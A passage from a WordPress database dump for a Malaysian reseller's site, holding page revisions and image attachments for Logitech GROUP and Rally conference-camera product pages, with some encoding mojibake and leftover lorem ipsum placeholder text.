07:06:17','',1349,'https://bintara.com.my/wp-content/uploads/2018/12/Artboard-51x.png',0,'attachment','image/png',0),(2910,1,'2019-02-14 15:01:38','2019-02-14 07:01:38','<h3>GROUP</h3><p>Affordable video conferencing for mid to large-sized meeting rooms</p><ul><li>See every detail with HD video and 10x zoom</li><li>Works with your meeting and video conferencing applications</li><li>Crystal-clear audio for up to 20 participants</li></ul>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n			<h4>KEY FEATURES</h4>		\n		https://youtu.be/vOMW9wEaoqo<h3>PERFECT FOR LARGER ROOMS</h3><p>GROUP, our video conferencing solution for rooms that seat 14â€“20 people, delivers high quality HD video and crystal clear audio, allowing any meeting place to be a video collaboration space. With advanced features like acoustic echo cancellation, noise reduction technology, and intuitive controls, itâ€™s easier than ever to include everyone in the conversation.</p><h3>PLUG-AND-PLAY SIMPLICITY</h3><p>USB plug-and-play connectivity makes GROUP a breeze to deploy and use. Simply connect GROUP the conference room computer or your laptop through USB, and youâ€™re good to go. Use GROUP with any video conferencing software, including those you already use. For great-sounding audio calls, pair your mobile device with BluetoothÂ® wireless technology to the GROUP speakerphone.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>HIGH-DEFINITION VIDEO</h3><p>Bring meetings into focus with GROUPâ€™s premium lens, 10x lossless zoom, and HD 1080p/30 performance. Perfectly frame presenters and whiteboards with pan/tilt control, and zoom in for detail and clarity. GROUPâ€™s 90Â° field-of-view provides ideal coverage for medium and large conference rooms, with motorized pan and tilt for wall-to-wall, floor-to-ceiling coverage.</p><h3>NATURAL-SOUNDING AUDIO</h3><p>Everyone hears and can be heard with GROUPâ€™s full-duplex speakerphone, which delivers sound thatâ€™s crisp, clear, and highly intelligible. Acoustic echo cancellation and noise reduction technology make conversations natural-sounding while reducing reverberation and ambient noise.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-2.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/conferencecam-group-2-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>SPEAKERPHONE WITH BLUETOOTH</h4><p>Hear and be heard with life-like clarity. GROUPâ€™s full-duplex speakerphone provides 360Â° coverage with four omnidirectional mics. Beamforming technology helps pick up speech throughout a 6m / 20 ft diameter while reducing keyboard clicks and other audible distractions. You can even pair GROUP with your smartphone or tablet to enjoy outstanding audio clarity and ample volume with mobile applications and conference calls.</p><h4>CERTIFIED FOR BUSINESS</h4><p>GROUP offers a plug-and-play USB connection to conference room computers, and is certified for Skype for Business, Microsoft CortanaÂ®, Cisco Jabberâ„¢ compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom. If your preferred application can recognize a webcam, you can use it with GROUP.</p><h4>CONVENIENT CONTROLS</h4><p>GROUPâ€™s speakerphone provides a convenient dock for the handheld remote control, and features an LCD status screen and tactile buttons to mute audio, adjust volume, move the camera, and more.</p><h4>AVAILABLE EXPANSION MICS</h4><p>Extend the range of the GROUP video conferencing system with Logitech GROUP Expansion Mics. Accommodate up to 20 people in one large room and make sure everyoneâ€™s voice can be heard. Simply plug the microphones into the GROUP speakerphone: they are automatically recognized and configured. An indicator light shows when the microphone is muted, when a call is active, and when Bluetooth wireless pairing has begun.</p><h4>MUTE WITH CONFIDENCE</h4><p>With tactile mute buttons on the speakerphone, handheld remote, and optional expansion mics, GROUP makes it easy to assure your privacy. When muted, GROUPâ€™s LED status ring lights up red, a subtle yet obvious assurance thatâ€™s easily seen throughout the room.</p><h4>CABLING MADE EASY</h4><p>GROUPâ€™s compact Hub simplifies cabling and makes it easy to run cables under tables and through conduit. Integrated data and power means that the camera and speakerphone each connect with a single cable. The included 5m / 16 ft cables give you lots of placement options, while optional extended cables offer double or triple the reach.</p><h4>FIELD UPGRADEABLE</h4><p>With regular firmware updates, Logitech continuously improves the GROUP video conferencing experience. For example, recent updates delivered substantial improvements to automatic echo cancellation and gain control, plus upgraded beamforming and duplex performance. Itâ€™s another reason why Logitech delivers the best value proposition in the industry.</p><p>[maxbutton id=\"3\" ]</p>','LOGITECH GROUP','','inherit','closed','closed','','2000-revision-v1','','','2019-02-14 15:01:38','2019-02-14 07:01:38','',2000,'https://bintara.com.my/blog/2019/02/14/2000-revision-v1/',0,'revision','',0),(2911,1,'2019-02-14 15:05:43','2019-02-14 07:05:43','','rally-system-b2b-pdp','','inherit','closed','closed','','rally-system-b2b-pdp-2','','','2019-02-14 15:05:43','2019-02-14 07:05:43','',2906,'https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp.jpg',0,'attachment','image/jpeg',0),(2912,1,'2019-02-14 15:07:52','2019-02-14 07:07:52','','rally-system-b2b-pdp (1)','','inherit','closed','closed','','rally-system-b2b-pdp-1','','','2019-02-14 15:07:52','2019-02-14 07:07:52','',2906,'https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-1.jpg',0,'attachment','image/jpeg',0),(2913,1,'2019-02-14 15:11:27','2019-02-14 07:11:27','','rally-system-b2b-pdp (2)','','inherit','closed','closed','','rally-system-b2b-pdp-2-2','','','2019-02-14 15:11:27','2019-02-14 07:11:27','',2906,'https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-2.jpg',0,'attachment','image/jpeg',0),(2914,1,'2019-02-14 15:12:28','2019-02-14 07:12:28','','rally-system-b2b-pdp (3)','','inherit','closed','closed','','rally-system-b2b-pdp-3','','','2019-02-14 15:12:28','2019-02-14 07:12:28','',2906,'https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-3.jpg',0,'attachment','image/jpeg',0),(2915,1,'2019-02-14 15:21:11','2019-02-14 07:21:11','<h3>RALLY</h3><p>Premium Ultra-HD ConferenceCam system with automatic camera control</p><ul><li>RightSenseâ„¢ technology automates a better user experience</li><li>Modular audio for full coverage of medium to very large rooms</li><li>Premium components and sleek industrial design</li></ul>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>ALL TOGETHER NOW</h3><p>Logitech Rally delivers studio-quality video, unmatched voice clarity, and RightSenseâ„¢ automation for better meetings with video conferencing applications that work with USB devices, including Google Hangouts Meet, Microsoft SkypeÂ® for Business, Microsoft Teams, and Zoom. With modular audio, thoughtful cable management and premium finishes, Rally integrates beautifully into medium and larger rooms.</p>		\n			<h4>KEY FEATURES</h4>		\n		https://youtu.be/uwx62jjxOnE<h3>STUDIO-QUALITY VIDEO</h3><p>With an Ultra-HD imaging system, Rally delivers brilliantly sharp video, outstanding color, and exceptional optical accuracy at resolutions up to 4K. Logitech RightLightâ„¢technology optimizes light balance to emphasize faces and render natural-looking skin tones, even in dim or backlit conditions.</p><h3>ADVANCED MODULAR AUDIO</h3><p>Crystal-clear audio is essential for world-class video conferencing, and Rally excels in delivering sound thatÂ’s natural, crisp, and highly intelligible. Logitech RightSoundÂ™â„¢ enhances voice clarity by suppressing background noise, auto-leveling voices, and focusing on active speakers. Exquisitely sensitive mic pods ensure that everyone in the meeting can be clearly heard while stand-alone speakers fill larger rooms with rich, life-like sound.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>SLEEK INDUSTRIAL DESIGN</h3><p>Every component in the Rally system features premium industrial design suitable for any professional setting. Even as Rally helps everyone look and sound great during video meetings, each part of the system looks great in its own right. The premium PTZ camera at the core of the system is elegantly finished in matte black with slate gray metal trim, complemented by sleekly designed audio components and accessories that look great in any room.</p><h3>ENHANCED USER EXPERIENCE</h3><p>Logitech RightSenseâ„¢ is a suite of technologies built into Rally that automate a better user experience. RightSightâ„¢ perfectly auto-frames participants no matter their distance from the lens. RightLightâ„¢ prioritizes faces over environment to render natural-looking skin tones while RightSoundÂ™â„¢ enhances vocal clarity by suppressing background noise, auto-leveling voices, and focusing on active speakers to support better meetings â€” Â—automatically!</p>https://youtu.be/-xGIqpPOyXs		\n										<img width=\"800\" height=\"451\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-2.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-2-768x433.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>SMART CABLING AND CONTENT SHARING</h3><p>With a Display Hub and Table Hub to keep cables neat and organized, Rally components and the meeting computer remain securely out of sight. Connected by a single CAT6 cable, both hubs feature a full complement of connections so you can locate the meeting computer near the display or at the table. An HDMI input on the Table Hub eliminates the need for extra-cost cable extenders and makes wired content sharing easy.</p>		\n										<img width=\"800\" height=\"451\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-3.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-3.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-3-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-3-768x433.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>SEE EVERYONE, PERFECTLY FRAMED</h4><p>Logitech RightSightÂ™ camera control1 automatically moves and adjusts the lens to comfortably frame meeting participants in rooms of all shapes and sizes.</p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.','LOGITECH RALLY','','inherit','closed','closed','','2906-revision-v1','','','2019-02-14 15:21:11','2019-02-14 07:21:11','',2906,'https://bintara.com.my/blog/2019/02/14/2906-revision-v1/',0,'revision','',0),(2978,1,'2019-03-04 14:52:30','2019-03-04 06:52:30','<h3>RALLY</h3>\r\nPremium Ultra-HD ConferenceCam system with automatic camera control\r\n<ul>\r\n 	<li>RightSenseâ„¢ technology automates a better user experience</li>\r\n 	<li>Modular audio for full coverage of medium to very large rooms</li>\r\n 	<li>Premium components and sleek industrial design</li>\r\n</ul>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png\" sizes=\"(max-width: 300px) 100vw, 300px\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png 687w\" alt=\"\" width=\"300\" height=\"262\" />\r\n<h3>ALL TOGETHER NOW</h3>\r\nLogitech Rally delivers studio-quality video, unmatched voice clarity, and RightSenseâ„¢ automation for better meetings with video conferencing applications that work with USB devices, including Google Hangouts Meet, Microsoft SkypeÂ® for Business, Microsoft Teams, and Zoom. With modular audio, thoughtful cable management and premium finishes, Rally integrates beautifully into medium and larger rooms.\r\n<h4>KEY FEATURES</h4>\r\nhttps://youtu.be/uwx62jjxOnE\r\n<h3>STUDIO-QUALITY VIDEO</h3>\r\nWith an Ultra-HD imaging system, Rally delivers brilliantly sharp video, outstanding color, and exceptional optical accuracy at resolutions up to 4K. Logitech RightLightâ„¢technology optimizes light balance to emphasize faces and render natural-looking skin tones, even in dim or backlit conditions.\r\n<h3>ADVANCED MODULAR AUDIO</h3>\r\nCrystal-clear audio is essential for world-class video conferencing, and Rally excels in delivering sound thatÂ’s natural, crisp, and highly intelligible. Logitech RightSoundÂ™â„¢ enhances voice clarity by suppressing background noise, auto-leveling voices, and focusing on active speakers. Exquisitely sensitive mic pods ensure that everyone in the meeting can be clearly heard while stand-alone speakers fill larger rooms with rich, life-like sound.\r\n\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-768x432.jpg 768w\" alt=\"\" width=\"800\" height=\"450\" />\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-1.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-1-768x432.jpg 768w\" alt=\"\" width=\"800\" height=\"450\" />\r\n<h3>SLEEK INDUSTRIAL DESIGN</h3>\r\nEvery component in the Rally system features premium industrial design suitable for any professional setting. Even as Rally helps everyone look and sound great during video meetings, each part of the system looks great in its own right. The premium PTZ camera at the core of the system is elegantly finished in matte black with slate gray metal trim, complemented by sleekly designed audio components and accessories that look great in any room.\r\n<h3>ENHANCED USER EXPERIENCE</h3>\r\nLogitech RightSenseâ„¢ is a suite of technologies built into Rally that automate a better user experience. RightSightâ„¢ perfectly auto-frames participants no matter their distance from the lens. RightLightâ„¢ prioritizes faces over environment to render natural-looking skin tones while RightSoundÂ™â„¢ enhances vocal clarity by suppressing background noise, auto-leveling voices, and focusing on active speakers to support better meetings â€” Â—automatically!\r\n\r\nhttps://youtu.be/-xGIqpPOyXs\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-2.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-2-768x433.jpg 768w\" alt=\"\" width=\"800\" height=\"451\" />\r\n<h3>SMART CABLING AND CONTENT SHARING</h3>\r\nWith a Display Hub and Table Hub to keep cables neat and organized, Rally components and the meeting computer remain securely out of sight. Connected by a single CAT6 cable, both hubs feature a full complement of connections so you can locate the meeting computer near the display or at the table. An HDMI input on the Table Hub eliminates the need for extra-cost cable extenders and makes wired content sharing easy.\r\n\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-3.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-3.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-3-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-3-768x433.jpg 768w\" alt=\"\" width=\"800\" height=\"451\" />\r\n<h4>ADDITIONAL FEATURES</h4>\r\n<h4>SEE EVERYONE, PERFECTLY FRAMED</h4>\r\nLogitech RightSightÂ™ camera control1 automatically moves and adjusts the lens to comfortably frame meeting participants in rooms of all shapes and sizes.\r\n<h4>LET THE SUNSHINE IN</h4>\r\nEven in meeting rooms with bright windows, Logitech RightLightÂ™ technology with Wide Dynamic Range (WDR) prioritizes faces and human figures over objects and surfaces. The result is a balanced image that renders participants in flattering light with reduced glare and softer shadows, even in dim or backlit conditions\r\n<h4>ADAPTIVE PAN, TILT AND ZOOM</h4>\r\nPan and tilt speeds automatically adapt to the level of zoom. The result: faster camera movement when zoomed out for quick framing and slower camera movement when zoomed in for more control.\r\n<h4>FRONT OF ROOM AUDIO</h4>\r\nUnlike tabletop speakerphones that decouple voices from video, Rally speakers are designed for placement at the front of the room. By aligning speakers with the display, a person\'Â’s voice and video both come from the same place Â— and never from behind you â€” Â— so conversations feel more natural and lifelike.\r\n<h4>OPTIONAL MOUNTING KIT</h4>\r\nAdd Rally Mounting Kit for a streamlined installation of each component. Strong wall mounts allow ideal placement for the camera and two speakers, while ventilated mounting plates attach the display and table hubs on a wall or beneath a table. Two cleverly-designed retainers keep cables secure.\r\n<h4>LOUD AND CLEAR</h4>\r\nThe Rally display hub powers up to two speakers, providing rich sound even in larger rooms. A patent-pending suspension system virtually eliminates vibrations that travel through walls, stands, and tables. This improves echo cancellation while keeping video shake-free, even at high volume levels and when zoomed in.\r\n<h4>UP TO 7 MIC PODS</h4>\r\nFor rooms with more than 10 participants, add Rally Mic Pods to expand audio coverage and provide convenient access to mute controls. Each pod adds coverage for six more participants, so you can deploy Rally in large meeting spaces and boardrooms with up to 46 people.\r\n<h4>FLEXIBLE MIC POD CABLING</h4>\r\nA more flexible alternative to daisy-chain connections, Rally Mic Pod Hub makes it easy to run cables beneath the table with three connections for Rally Mic Pods or additional Mic Pod Hubs. With a single-cable connection, participants can reposition individual mic pods to make space on the table or to bring mute control within easy reach.\r\n\r\n[maxbutton id=\"3\" ]','Logitech RALLY','','inherit','closed','closed','','2906-revision-v1','','','2019-03-04 14:52:30','2019-03-04 06:52:30','',2906,'https://bintara.com.my/blog/2019/03/04/2906-revision-v1/',0,'revision','',0),(2916,1,'2019-02-14 15:27:51','2019-02-14 07:27:51','<h3>RALLY</h3><p>Premium Ultra-HD ConferenceCam system with automatic camera control</p><ul><li>RightSenseâ„¢ technology automates a better user experience</li><li>Modular audio for full coverage of medium to very large rooms</li><li>Premium components and sleek industrial design</li></ul>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>ALL TOGETHER NOW</h3><p>Logitech Rally delivers studio-quality video, unmatched voice clarity, and RightSenseâ„¢ automation for better meetings with video conferencing applications that work with USB devices, including Google Hangouts Meet, Microsoft SkypeÂ® for Business, Microsoft Teams, and Zoom. With modular audio, thoughtful cable management and premium finishes, Rally integrates beautifully into medium and larger rooms.</p>		\n			<h4>KEY FEATURES</h4>		\n		https://youtu.be/uwx62jjxOnE<h3>STUDIO-QUALITY VIDEO</h3><p>With an Ultra-HD imaging system, Rally delivers brilliantly sharp video, outstanding color, and exceptional optical accuracy at resolutions up to 4K. Logitech RightLightâ„¢technology optimizes light balance to emphasize faces and render natural-looking skin tones, even in dim or backlit conditions.</p><h3>ADVANCED MODULAR AUDIO</h3><p>Crystal-clear audio is essential for world-class video conferencing, and Rally excels in delivering sound thatÂ’s natural, crisp, and highly intelligible. Logitech RightSoundÂ™â„¢ enhances voice clarity by suppressing background noise, auto-leveling voices, and focusing on active speakers. Exquisitely sensitive mic pods ensure that everyone in the meeting can be clearly heard while stand-alone speakers fill larger rooms with rich, life-like sound.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-1.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-1-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>SLEEK INDUSTRIAL DESIGN</h3><p>Every component in the Rally system features premium industrial design suitable for any professional setting. Even as Rally helps everyone look and sound great during video meetings, each part of the system looks great in its own right. The premium PTZ camera at the core of the system is elegantly finished in matte black with slate gray metal trim, complemented by sleekly designed audio components and accessories that look great in any room.</p><h3>ENHANCED USER EXPERIENCE</h3><p>Logitech RightSenseâ„¢ is a suite of technologies built into Rally that automate a better user experience. RightSightâ„¢ perfectly auto-frames participants no matter their distance from the lens. RightLightâ„¢ prioritizes faces over environment to render natural-looking skin tones while RightSoundÂ™â„¢ enhances vocal clarity by suppressing background noise, auto-leveling voices, and focusing on active speakers to support better meetings â€” Â—automatically!</p>https://youtu.be/-xGIqpPOyXs		\n										<img width=\"800\" height=\"451\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-2.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-2-768x433.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		<h3>SMART CABLING AND CONTENT SHARING</h3><p>With a Display Hub and Table Hub to keep cables neat and organized, Rally components and the meeting computer remain securely out of sight. Connected by a single CAT6 cable, both hubs feature a full complement of connections so you can locate the meeting computer near the display or at the table. An HDMI input on the Table Hub eliminates the need for extra-cost cable extenders and makes wired content sharing easy.</p>		\n										<img width=\"800\" height=\"451\" src=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-3.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-3.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-3-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/02/rally-system-b2b-pdp-3-768x433.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n			<h4>ADDITIONAL FEATURES</h4>		\n		<h4>SEE EVERYONE, PERFECTLY FRAMED</h4><p>Logitech RightSightÂ™ camera control1 automatically moves and adjusts the lens to comfortably frame meeting participants in rooms of all shapes and sizes.</p><h4>LET THE SUNSHINE IN</h4><p>Even in meeting rooms with bright windows, Logitech RightLightÂ™ technology with Wide Dynamic Range (WDR) prioritizes faces and human figures over objects and surfaces. The result is a balanced image that renders participants in flattering light with reduced glare and softer shadows, even in dim or backlit conditions</p><h4>ADAPTIVE PAN, TILT AND ZOOM</h4><p>Pan and tilt speeds automatically adapt to the level of zoom. The result: faster camera movement when zoomed out for quick framing and slower camera movement when zoomed in for more control.</p><h4>FRONT OF ROOM AUDIO</h4><p>Unlike tabletop speakerphones that decouple voices from video, Rally speakers are designed for placement at the front of the room. By aligning speakers with the display, a person\'Â’s voice and video both come from the same place Â— and never from behind you â€” Â— so conversations feel more natural and lifelike.</p><h4>OPTIONAL MOUNTING KIT</h4><p>Add Rally Mounting Kit for a streamlined installation of each component. Strong wall mounts allow ideal placement for the camera and two speakers, while ventilated mounting plates attach the display and table hubs on a wall or beneath a table. Two cleverly-designed retainers keep cables secure.</p><h4>LOUD AND CLEAR</h4><p>The Rally display hub powers up to two speakers, providing rich sound even in larger rooms. A patent-pending suspension system virtually eliminates vibrations that travel through walls, stands, and tables. This improves echo cancellation while keeping video shake-free, even at high volume levels and when zoomed in.</p><h4>UP TO 7 MIC PODS</h4><p>For rooms with more than 10 participants, add Rally Mic Pods to expand audio coverage and provide convenient access to mute controls. Each pod adds coverage for six more participants, so you can deploy Rally in large meeting spaces and boardrooms with up to 46 people.</p><h4>FLEXIBLE MIC POD CABLING</h4><p>A more flexible alternative to daisy-chain connections, Rally Mic Pod Hub makes it easy to run cables beneath the table with three connections for Rally Mic Pods or additional Mic Pod Hubs. With a single-cable connection, participants can reposition individual mic pods to make space on the table or to bring mute control within easy reach.</p><p>[maxbutton id=\"3\" ]</p>','LOGITECH RALLY','','inherit','closed','closed','','2906-revision-v1','','','2019-02-14 15:27:51','2019-02-14 07:27:51','',2906,'https://bintara.com.my/blog/2019/02/14/2906-revision-v1/',0,'revision','',0),(2917,1,'2019-02-14 16:37:16','2019-02-14 08:37:16','<h2>VIDEO CONFERENCINGâ€‹</h2>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>CONFERENCE CAMERAS</h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h3>GROUP</h3><p>Video conferencing for mid to large-sized meeting rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h4>Rally</h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-150x150.png 150w, 